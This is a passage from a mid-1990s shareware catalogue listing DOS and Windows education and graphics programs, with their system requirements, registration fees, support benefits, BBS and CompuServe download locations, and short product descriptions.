PHRASE.ZIP + Combo hangman & wheel of fortune. New concept. See full + description on page 630. + + Product: SPANISH DRILL! + Author: + Version: 1.8 (11-09-93) + Needs: IBM PC, DOS 4.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hard disk. + Registration fee: $5.00 (add $2.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 6 months of phone, + CompuServe, mail support; 3-month return policy; all ASP-wide + + Chapter 13, "Education" 471 + + + + offers (see page 5); discounts on other products. 2-month free + upgrading allowed. + Look for: SPAN1.ZIP on BBSs; SPAN1.ZIP on CompuServe in CIS:LIB + forum LIBrary 0 (or contact userID 73353,121 for assistance); + SPAN1.ZIP on GEnie in GE forum LIBrary 0. + Download size: 46k (about four minutes with a 2400 baud modem) + Description: + Spanish vocabulary flash card program that has a practice mode + for learning new Spanish words and an exam mode to test and + score you on what you have learned. Requires you to type the + correct Spanish letters, such as accents and tildes! Fun, + inexpensive and easy way to develop your basic Spanish + vocabulary. Start with nouns, adjectives, and verbs, then work + your way up to verb conjugation, common phrases and full + sentences! + + + Product: Spanish Helper Level One + Author: , 212-598-4939 + Version: 1.5 (10-01-95) + Needs: IBM PC, DOS 3.3 or better. 200k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hard disk. + Strongly recommended: CD-ROM drive. + Registration fee: $24.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, BBS, CompuServe, mail support; 3-month + return policy; bonus utilities; all ASP-wide offers (see + page 5). Program with Spanish jokes with option to see + translations. + Look for: availability unknown on BBSs. + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + An excellent interactive program to learn Spanish: Levels Two + and Three are available by registration. The programs' + interactive quizzing system allows you to learn vocabulary + rapidly. Contains a large database of vocabulary and allows you + to make your own lists to quiz yourself. Its well-planned + design makes it the perfect program for individuals or schools. + + Chapter 13, "Education" 472 + + + + Product: WRITE CHINESE + Author: , 214-517-0279 + Version: 1.00 (05-18-94) + Needs: IBM AT (80286), DOS 3.0 or better. 512k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $29.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; 1-month return policy; bonus + data; all ASP-wide offers (see page 5); disks of other + shareware. + Look for: CHINA100.ZIP on BBSs (call 214-690-2168 to download it + at no charge). + Download size: 143k (about eleven minutes with a 2400 baud modem) + Description: + This program teaches basic Chinese calligraphy. Focuses on the + 150 most frequently encountered characters which constitute + approximately 1/3 of all printed materials. The student + practices calligraphy by drawing characters on simulated "nine- + square box" paper. Evaluates each character as it is being + drawn, providing continuous feedback and positive + reinforcement. Also has quiz options to teach character + meanings and Mandarin/Cantonese transliterations. + + + 13.10 Geography + + See also: Graphics. + + Product: CULTURAL AWARENESS + Cultural literacy game. See full description on page 447. + + Product: Landscape Explorer + 3D landscape visualization tool. See full description on + page 508. + + Product: MAPIT + Detailed world mapping with GPS data import. See full + description on page 508. + + Chapter 13, "Education" 473 + + + + Product: U.S. Geography Tutor + Author: , 415-474-9973 + Version: 1.0 (04-01-94) + Needs: IBM PC, Windows 3.0 or better. 256k RAM. + Registration fee: $20.00 + Registration benefits: 31/2" master disk(s); 3 months of + CompuServe, mail support; 1-month return policy; all ASP-wide + offers (see page 5). 1-month free upgrading allowed. Bonus + geography-related book. + Look for: availability unknown on BBSs; GEOUSA.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 0. + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + A Windows program intended for grade school children. It tests/ + teaches you U.S. geography in an entirely visual way. Learn + about state locations, capital cities, lakes and rivers, simply + by clicking the mouse. + + + Product: VERSAMAP + Draws outline maps on 13 map projections. See full description + on page 509. + + + 13.11 History + + Product: Bible Timeline + Interactive Bible timelines. See full description on page 587. + + Product: Bible Timeline for Windows + Interactive historical timelines. See full description on + page 592. + + Product: CHRONOS + Author: , 206-523-6135 + Version: 2.18 (01-10-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hercules monitor; Dual 720k floppy drives; HP DeskJet + printer; HP LaserJet printer. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of CompuServe, mail support; bonus utilities; disks of + other shareware; discounts on other products. + Look for: availability unknown on BBSs; CHRNOS.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 11 (or contact userID 76703,3046 for + assistance). + SWREG#: 381 + Download size: 132k (about ten minutes with a 2400 baud modem) + Description: + How old was Paul Revere when he rode into history? How many + years separated Michelangelo and Cortez? This program lets you + sort and select by individual people and events, or groups and + + Chapter 13, "Education" 474 + + + + factions, to develop new insights and trace patterns across + different eras and cultures. Useful to history and art + students, teachers, genealogists, lawyers, writers or anyone + interested in exploring historical relations or cultural + events. Prints wall charts. Also includes an automatic trivia + game generator + + + Product: CHRONOS:Windows in Time + Author: , 206-523-6135 + Version: 1.10 (09-01-95) + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; bonus data; bonus + graphics; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. + Look for: availability unknown on BBSs; WIT.ZIP on CompuServe in + CIS:WINPROD forum LIBrary 14 (or contact userID 76703,3046 for + assistance). + SWREG#: 5787 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + How old was Paul Revere when he rode into history? This lets + you sort and selects individual people and events, or groups + and factions, to develop new insights and trace patterns + across different eras and cultures. You can modify or expand + any of the datasets. Used by history & art students, teachers, + genealogists, lawyers, writers or anyone interested in + exploring historical relations or cultural events. + + + Product: CULTURAL AWARENESS + Cultural literacy game. See full description on page 447. + + Product: DayMaster + A day in history & reminder system. See full description on + page 141. + + Product: On This Day + Author: , 508-851-6204 + Version: 2.0 (07-30-94) + Needs: IBM PC, DOS 2.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Hard disk. + Registration fee: $30.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, newsletter, mail support; + 1-month return policy; bonus utilities; bonus data; disks of + + Chapter 13, "Education" 475 + + + + other shareware; discounts on other products. 3-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: OTD_20.ZIP on BBSs (call 508-454-3864 to download it at + no charge); OTD.ZIP on CompuServe in CIS:PCUTIL forum LIBrary 7 + (or contact userID 70313,3615 for assistance); OTD_20.ZIP on + GEnie in IBMPC forum LIBrary 15 (or contact userID W.GEISER for + assistance). + SWREG#: 2074 + PsL#: 10654 + Download size: 128k (about ten minutes with a 2400 baud modem) + Description: + This event DB and printing program accepts the date in which + you are interested and it prints the events that happened on + that day in history: + * Astronomical events (moon phases, solstices, etc) + * Birthdays of famous people + * Religious holidays (Jewish, Christian, etc) + * Much more + Uses text file databases, meaning you can edit them with your + favorite text editor (though they can be read in compressed + form). A personal events file is also supported. + + + Product: On This Day for Windows + Author: , 508-851-6204 + Version: 2.0 (07-30-94) + Needs: IBM PC, Windows 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $30.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, newsletter, mail support; + 1-month return policy; bonus utilities; bonus data; disks of + other shareware; discounts on other products. 3-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: WOTD_20.ZIP on BBSs (call 508-454-3864 to download it + at no charge); WOTD.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 70313,3615 for assistance); + WOTD_20.ZIP on GEnie in WINDOWS forum LIBrary 76 (or contact + userID W.GEISER for assistance). + SWREG#: 2093 + PsL#: 10654 + Download size: 164k (about twelve minutes with a 2400 baud modem) + Description: + This event DB and printing program accepts the date in which + you are interested and it prints the events that happened on + that day in history: + * Astronomical events (moon phases, solstices, etc) + * Birthdays of famous people + * Religious holidays (Jewish, Christian, etc) + * Much more + Uses text file databases, meaning you can edit them with your + favorite text editor (though they can be read in compressed + form). A personal events file is also supported. + + Chapter 13, "Education" 476 + + + + 13.12 Literature + + Product: Creativity Package + Become more creative & improve your writing. See full + description on page 210. + + Product: CULTURAL AWARENESS + Cultural literacy game. See full description on page 447. + + Product: Have You Read That Movie? + Quiz/database: films based on literary works. See full + description on page 626. + + Product: Jokes & Quotes + Network/standalone daily message system. See full description + on page 384. + + Product: New Testament for Windows + New Testament search, maps, study aids, notes. See full + description on page 586. + + Product: Poetry Generator + Turn your computer into a poet! See full description on + page 211. + + + 13.13 Math + + See also: Mathematics. + + Product: Equatron + Beat the computer at solving the equation. See full + description on page 604. + + + 13.14 Music + + See also: Home & hobby, Music. + + Product: MOZART (Virtuoso Edition) + Music processor. See full description on page 561. + + Chapter 13, "Education" 477 + + + + Product: A MUSICAL TUTORIAL + Author: , 613-933-7871 + Version: 1.1 (06-01-95) + Needs: IBM PC, DOS 4.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor. + Strongly recommended: Mouse; Epson printer. + Registration fee: $25.00 (add $2.50 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; 1-month return policy; + disks of other shareware; discounts on other products; + discounts on upgrades. 6-month free upgrading allowed. + Look for: MTDOS11.ZIP on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + An excellent way to promote and encourage musical study using a + graphically oriented environment. Great for children or adults. + Treble & bass sight reading (notes & chords). Associate notes + to piano keys. Chord dictionary. Action games to promote + learning. Play, view, and print scales, chords, and broken + chords. User log tracks learning. Play classics. Print sight + reading test papers (3 difficulty levels). Key signature + recognition, Etc. Makes music lessons fun for children or + adults! + + + Product: A MUSICAL TUTORIAL for Windows + Author: , 613-933-7871 + Version: 1.2 (06-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4000k RAM; VGA + monitor; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Mouse; Epson printer; sound card. + Registration fee: $25.00 (add $2.50 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, mail support; + 1-month return policy; bonus utilities; disks of other + shareware; discounts on other products; discounts on upgrades. + 6-month free upgrading allowed. + Look for: MTWIN12.ZIP on BBSs. + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + An excellent way to encourage musical study using a graphically + oriented environment. Treble / Bass note & chord sight reading. + Associate notes to piano keys. Chord dictionary. Action games + to promote learning. Play, view and print scales, chords and + broken chords. User log tracks learning. Play classics. Print + sight reading test papers. User levels. Key signature + recognition, Etc. Makes music lessons fun for children or + adults! Supports SuperVGA. + + Chapter 13, "Education" 478 + + + + Product: MusicEase + Music score editor with WYSIWYG interface. See full + description on page 563. + + Product: NoteWorthy + Music publishing system. See full description on page 563. + + Product: Relor Rhyming Dictionary + Type in a word & program displays rhyme words. See full + description on page 203. + + + 13.15 Science & ecology + + Product: CircumSpace + Space travel simulator by author of SkyGlobe. See full + description on page 518. + + Product: CULTURAL AWARENESS + Cultural literacy game. See full description on page 447. + + Product: Ecomaster + Author: , 206-523-6135 + Version: 1.01 (09-01-95) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk; + Mouse. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, CompuServe, mail support; bonus utilities; bonus data; + bonus graphics; bonus game hints; disks of other shareware; + discounts on other products. + Look for: availability unknown on BBSs; ECO.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 3 (or contact userID 76703,3046 for + assistance). + SWREG#: 7161 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + A diverting ecology game for one or more players in which you + bid for and trade animals based on their abilities to thrive in + different environments. No previous biological experience is + assumed. For ages 10 and up. Uses digitized photography of + the animals the animals and scanned images for the ecological + backdrops. + + Chapter 13, "Education" 479 + + + + Product: ESPTEST + Author: , 916-927-2602 + Version: 1.0 (05-26-92) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $35.00 (add $4.00 for shipping to U.S. + addresses) (add $11.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 51/4" master disk(s); 3 + months of unlimited phone, newsletter, mail support; all ASP- + wide offers (see page 5). + Look for: availability unknown on BBSs; ESPTES.ZIP on CompuServe + in CIS:NEWAGE forum LIBrary 2 (or contact userID 70724,2276 for + assistance). + Download size: 93k (about seven minutes with a 2400 baud modem) + Description: + A serious parapsychology tool that is easy to use. It can be + used by the student of parapsycholog or anyone who wants to go + on a journey of self discovery. After you selec the testing + mode you want and the file name you want it can record your + efforts to defey the laws of chance. Results display into two + screens of statistics and the file can be read into other + statistic programs for analysis. Use in psychology or + statistics class. + + + Product: GREEN + Ecology simulation game. See full description on page 622. + + Product: Grow'Em + Grow from seed/cuttings. Easy, slick, great p. See full + description on page 538. + + Product: THE MAGIC OF THE MIND + Contentious philosophy of human behavior. See full description + on page 590. + + Product: Marnav + Conversion of GPS to and from LORAN data. See full description + on page 578. + + Product: Me & My Metabolism + Author: , 505-982-7251 + Version: 1.20 (12-12-93) + Needs: IBM PC, DOS 2.11 or better. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + lifetime return policy; bonus utilities; all ASP-wide offers + + Chapter 13, "Education" 480 + + + + (see page 5); disks of other shareware; discounts on other + products. 1 free update disk(s) sent out. + Look for: MMM120.ZIP on BBSs (call 505-662-0659 to download it at + no charge); MMM12.ZIP on CompuServe in CIS:GOODHEALTH forum + LIBrary 7 (or contact userID 71021,3617 for assistance); + MMM120.ZIP on GEnie in IBMPC forum LIBrary 3. + Download size: 107k (about eight minutes with a 2400 baud modem) + Description: + Examines your basal metabolic rate, assesses your energy + expenditure and evaluates your eating style. Focuses on the + individual person because body shape is an individual matter + influenced by the interplay of genetics, culture, personal + behavior, notions and feelings. There is no generic fat that + melts and stays away just because you "eat fewer calories." + You'll be surprised to discover how small changes in execise, + caloric intake or even the types of food you eat can make a + dramatic difference. + + + Product: METRIC-X + Metric-English-Metric conversion utility. See full description + on page 334. + + Product: PC-ECAP + Linear circuit analysis program with graphics. See full + description on page 359. + + Product: Periodic Table [***] + Author: , 918-241-2301 + Version: 3.0b (08-22-95) + Needs: IBM 80386, Windows 3.1 or better. 3072k RAM; VGA monitor; + Hard disk. + Strongly recommended: Mouse. + Registration fee: $30.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $8.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support; + 1-month return policy; all ASP-wide offers (see page 5); + discounts on other products. + Look for: PT302.ZIP on BBSs (call 918-747-2542 to download it at + no charge); PERTAB.ZIP on CompuServe in CIS:WINPROD forum + LIBrary 14 (or contact userID 72644,2335 for assistance). + SWREG#: 5289 + Download size: 946k (about 70 minutes with a 2400 baud modem) + Description: + The periodic table on command. It shows all 110 chemical + elements. Gives over 30 data items for each one. View element + details on multiple elements via its MDI interface. It has data + on over 800 isotopes and can display radioactive decay trees + for over 500. Has a quiz mode to test your knowlege of the + elements. View bond properties. Allows printing of the Table, + data and decay trees. Has x-ray data. Supports the Windows + clipboard. Great for students, researchers or professionals. + + Chapter 13, "Education" 481 + + + + Product: Simstat + Complete statistics and simulation program. See full + description on page 395. + + Product: SkyGlobe + Desktop planetarium that is fast, fun, easy. See full + description on page 519. + + Product: TommySoftware CAD/DRAW 4 Level1 + The 32bit verison of the CAD shareware stand. See full + description on page 490. + + Product: WinDatCon + Windows data conversion program. See full description on + page 121. + + + 13.16 Writing + + See also: Writing applications. + + Product: BIBLOGIC + Bibliographic reference database manager. See full description + on page 207. + + Product: BUDDY: A Tutorial Companion + Eight-lesson AI tutorial for clearer writing. See full + description on page 212. + + Product: Cliche Finder + Checks writing cliches. See full description on page 204. + + Product: Creativity Package + Become more creative & improve your writing. See full + description on page 210. + + Product: PHRASE.ZIP + Combo hangman & wheel of fortune. New concept. See full + description on page 630. + + Product: Relor Rhyming Dictionary + Type in a word & program displays rhyme words. See full + description on page 203. + + Product: Rev. Lowell's Treasury of Humor + Searchable indexed Windows humor collection. See full + description on page 609. + + Chapter 13, "Education" 482 + + + + Product: Zpeller + Author: , 816-429-3558 + Version: 4.10 (01-01-95) + Needs: IBM PC, DOS 2.11 or better. 330k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Dual 720k floppy drives; Hard disk; + Mouse. + Registration fee: $19.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + all ASP-wide offers (see page 5); disks of other shareware; + discounts on other products. Lifetime free upgrading allowed. + 99 free update disk(s) sent out. + Look for: ZPELR410.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ZPELER.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 70272,3317 for assistance). + SWREG#: 68 + Download size: 370k (about 28 minutes with a 2400 baud modem) + Description: + An easy and effective way to improve spelling and vocabulary + for the individual student or an entire classroom. Tests + students in not only correct spelling but the word's + definition. Tracks words continually missed to help the + th + student concentrate on those words. Whether the user is a 4 + grader with weekly tests or an out of school adult wanting to + improve those crucial spelling and vocabulary skills; Zpeller + is there to help. Handles up to 19 students at once, up to + 64,000 words per student. + + + 13.17 Software tools & add-ins + + 13.17.1 For other + + Product: WinFlash + Windows flash card program. See full description on page 452. + + + 13.18 Other + + Product: Puffwort's Evil Scheme [***] + Author: , 619-346-6609 + Version: 1.1 (10-01-95) + Registration fee: $15.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited phone, + CompuServe, mail support; 1-month return policy; all ASP-wide + + Chapter 13, "Education" 483 + + + + offers (see page 5); discounts on other products. Free Impact + Product Information Kit software package. + Look for: PEVILS11.ZIP on BBSs. + Download size: 1383k (about 103 minutes with a 2400 baud modem) + Description: + It's funny, it's fun, and it's got an important message! You + are pitted against an evil wizard who is attempting to bring + suffering to his land. You're the hero. You're confronted by + obstacles such as a locked room, torture pit, maze, and other + challenges, and players can actually win real prizes! There's + more! Not just filled with excitement, humor, drama, and fun, + it also points out deception in cigarette advertising and + dangers of tobacco use. + + Chapter 14, "Graphics" 484 + + + + + + Chapter 14 + Graphics + + + 14.1 Viewing programs + + Product: BitMapZ For Windows + Windows BMP Slide Show & Presentation System. See full + description on page 496. + + Product: Bubble Chart + Bubble chart, animated graph. See full description on + page 291. + + Product: The Complete Image + New image processor for big jobs/animations. See full + description on page 504. + + Product: Drag And View + File viewers for Windows 3.1. See full description on page 52. + + Product: ES-NMB + Network message board. See full description on page 383. + + Product: Image'n'Bits + Author: , 201-265-9855 + Version: 1.0 (11-24-93) + Needs: IBM AT (80286), Windows 3.1 or better. 2k RAM. + Registration fee: $25.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited fax, CompuServe, mail support. 3-month free + upgrading allowed. + Look for: availability unknown on BBSs; IMA.ZIP on CompuServe in + CIS:GRAPHSUP forum LIBrary 5 (or contact userID 70372,3466 for + assistance). + Download size: 470k (about 35 minutes with a 2400 baud modem) + Description: + Multiple image display, OLE, full clipboard support, printing, + funhouse distortion filters, multiple edge detection, + algorithms, contrast & brightness adjustments, histogram tool, + blurring, sharpening, low and high pass filtering, embossing, + on line help, dithering, color reduction, various file format + conversions, add text to images, posterization, mosaic, gray + scale, etc. + + + Product: Jasc Media Center [***] + Multimedia file cataloging. See full description on page 512. + + Product: Katelin Comment Manager + Full featured file/comment manager. See full description on + page 54. + + Chapter 14, "Graphics" 485 + + + + Product: Paint Shop + Author: , 612-930-9171 + Version: 3.0 (08-14-93) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $16.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 3-month limited return policy. + Look for: PS.ZIP on BBSs; PS.ZIP on CompuServe in CIS:WINSHARE + forum LIBrary 10 (or contact userID 72557,256 for assistance). + Download size: 248k (about 19 minutes with a 2400 baud modem) + Awards & nominations: 1994 winner, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1994 finalist, Shareware + Industry Awards. + Description: + This Windows program will display, convert, alter, print + images. Paint Shop supports BMP, CUT, DIB, GIF, IMG, LBM, MAC, + MSP, PCX, PIC, RLE, TGA, TIFF, and WPG. Altering includes + resizing, cropping, dithering, color adjusting, and much more. + Also does screen capturing. Editor's Choice - Shareware + Magazine. + + + Product: Paint Shop Pro [***] + Complete painting image creation editing tool. See full + description on page 492. + + Product: Papers + Wallpaper utilities for Windows. See full description on + page 178. + + Product: PhotoPat + Color-by-number patterns from bitmaps. See full description on + page 517. + + Product: PrintGF + Image printer. See full description on page 78. + + Product: PrintGL + Pen plotter emulator package. See full description on page 78. + + Product: RISS Icon Pak + Author: , 401-767-3106 + Version: 1.3 (05-02-94) + Needs: IBM AT (80286), Windows 3.0 or better. + Registration fee: $16.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited phone, fax, BBS, + CompuServe, newsletter, mail support; 3-month return policy; + + Chapter 14, "Graphics" 486 + + + + all ASP-wide offers (see page 5); discounts on other products; + discounts on upgrades. + Look for: RISSICON.ZIP on BBSs (call 401-7673931 to download it + at no charge); RICON.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + 2001 icons for Windows, plus the handy RISS Icon viewer utility + for viewing icons on a full-screen window! The icons are + conveniently categorized and divided into library collections, + such as games, applications, utilities, system, and many more. + Comes complete with SETUP system to automatically install on + "auto pilot". + + + Product: Super VGA Puzzle + Puzzle program based on travel photography. See full + description on page 614. + + Product: WinClip + Author: , 805-528-1759 + Version: 3.5 (04-15-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited fax, BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 5); discounts on upgrades. Lifetime free upgrading + allowed. + Look for: WINCLIP.ZIP on BBSs (call 805-528-1759 to download it + at no charge); WNCLIP.ZIP on CompuServe in CIS:DTPFORUM forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + An ideal way to view, print, and manage BMP, PCX, and GIF + files. AutoZoom shows images same size. Zoom from 10% to 500%. + Scroll. Prints individual images or thumbnail catalogs, with + file names and directories. Move, copy, or delete files. Load + any image into graphics editor of choice. Fast and easy to use. + + + 14.2 Drawing/editor programs + + See also: Business, Organization charts. + + Chapter 14, "Graphics" 487 + + + + Product: Cards+More + Author: , 610.640.0339 + Version: 2.1 (09-01-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $29.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; CARDSM.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 7 (or contact userID 76534,1166 + for assistance). + SWREG#: 6325 + Download size: 340k (about 25 minutes with a 2400 baud modem) + Description: + Versatile, easy-to-use graphics program. Creates cards, + announcements, labels, name tags, table tents, etc. Text, + graphics, shapes, lines. Supports 10 graphics formats. Re- + sizing, snap-to-grid, drag & drop. Many text attributes, in + cluding 180-degree rotation. Code 39 bar codes, POSTNET, auto- + numbering, import, merge, crop marks. High quality printing. + File managment. + + + Product: DRAFT CHOICE + Powerful, vector based CAD program. See full description on + page 499. + + Product: EDGEFLOW + Author: + Version: 5.0 (02-24-93) + Needs: IBM PC, DOS 2.0 or better. 500k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Hercules monitor; Mouse. + Strongly recommended: Hard disk; HP LaserJet printer; + Postscript printer; Epson printer. + Registration fee: $49.95 (add $10.00 for shipping to Canadian + addresses) (add $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 5). + Look for: EDGFLW.ZIP on BBSs (call 415-323-4193 to download it at + no charge). + Download size: 235k (about 18 minutes with a 2400 baud modem) + Description: + A flowcharting and diagramming program for DOS. It provides + fast, powerful, easy to use features for creating, maintaining, + and formatting any type of diagram consisting of shapes and + connectors (arrows) between shapes. Shapes automatically + adjust to text. Connectors automatically adjust when + connecting figures are moved. Pop-up menu interface, highly + + Chapter 14, "Graphics" 488 + + + + customizable, WYSIWYG output to many printers including most + laser printers and many plotters. + + + Product: EnVision Publisher + Desktop publishing program (full-feature). See full + description on page 198. + + Product: FF Business Cards + Create/print business and rolodex cards. See full description + on page 132. + + Product: FF Designer Envelopes + Drag and drop envelope designer/printer. See full description + on page 84. + + Product: FlowDraw Plus + Version: 1.00 (03-20-95) + Needs: IBM 80386, DOS 3.1 or better. 2048k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $39.00 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 12 + months of fax, CompuServe, mail support. 2-month return policy. + 3-month free upgrading allowed. + Look for: FDPLUS10.ZIP on BBSs (call 216-381-3320 to download it + at no charge); FDPLUS.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 10 (or contact userID 73230,403 for assistance). + Download size: 640k (about 48 minutes with a 2400 baud modem) + Description: + Helps you draw and print diagrams, flowcharts, and schematics. + Graphic interface uses a mouse - just point and click to draw. + Has 3 levels of zoom, 6 font sizes for text, automatic line and + arrow drawing, snap to grid, multiple undo, and full page view. + Program comes with symbol libraries for flowcharts, + electronics, and computers. Or you can create your own symbols + and symbol libraries. Import and export PCX files. Interactive + tutorial included. Most printers supported. + + + Product: Home Plan + Draw, print, edit & save house plans. See full description on + page 500. + + Product: Hubble + Hubble 2.21 image + doc edit & processing. See full + description on page 494. + + Product: MegaCad [***] + CAD program. See full description on page 501. + + Chapter 14, "Graphics" 489 + + + + Product: ProtoCAD 3D + 3-dimensional CAD/rendering program. See full description on + page 502. + + Product: SCP + Screen capture & print text to bitmap. See full description on + page 72. + + Product: SmartDraw [***] + Drag & drop flowcharting & draw for Windows. See full + description on page 506. + + Product: SmartDraw 95 [***] + Drag & drop flowcharting & draw for Windows. See full + description on page 506. + + Product: SuperFlow + Author: , 312-225-8133 + Version: V1.10 (10-01-93) + Needs: IBM PC, Windows 3.0 or better. 2048k RAM; VGA monitor; + Mouse. + Strongly recommended: SVGA monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Postscript printer. + Registration fee: $35.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited fax, CompuServe, mail + support; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; XSLFOW.EXE on CompuServe + in CIS:PCAPP forum LIBrary 0 (or contact userID 70671,2257 for + assistance). + Download size: 340k (about 25 minutes with a 2400 baud modem) + Description: + Powerful Windows based flowcharting and presentation + diagrammer. Features include auto connections re-routing, + configurable defaults, user defined objects (drawing objects, + connectors, templates), group operations (move, delete, align + space, font formatting and etc.), BMP import/export, zoom in/ + out, sub-chart linkage, password protection, tools box, + floating palette, cure/direct/auto line connections, extensive + drawing libraries, online help, clipboard supports and a lot + more. + + + Product: TommySoftware CAD/DRAW + Author: , 212-807-9720 + Version: 2.04E (06-01-95) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; VGA monitor. + Strongly recommended: Mouse. + Registration fee: US$59.95 (add US$5.00 for shipping to U.S. + addresses) (add US$12.00 for shipping to Canadian addresses) + (add US$15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 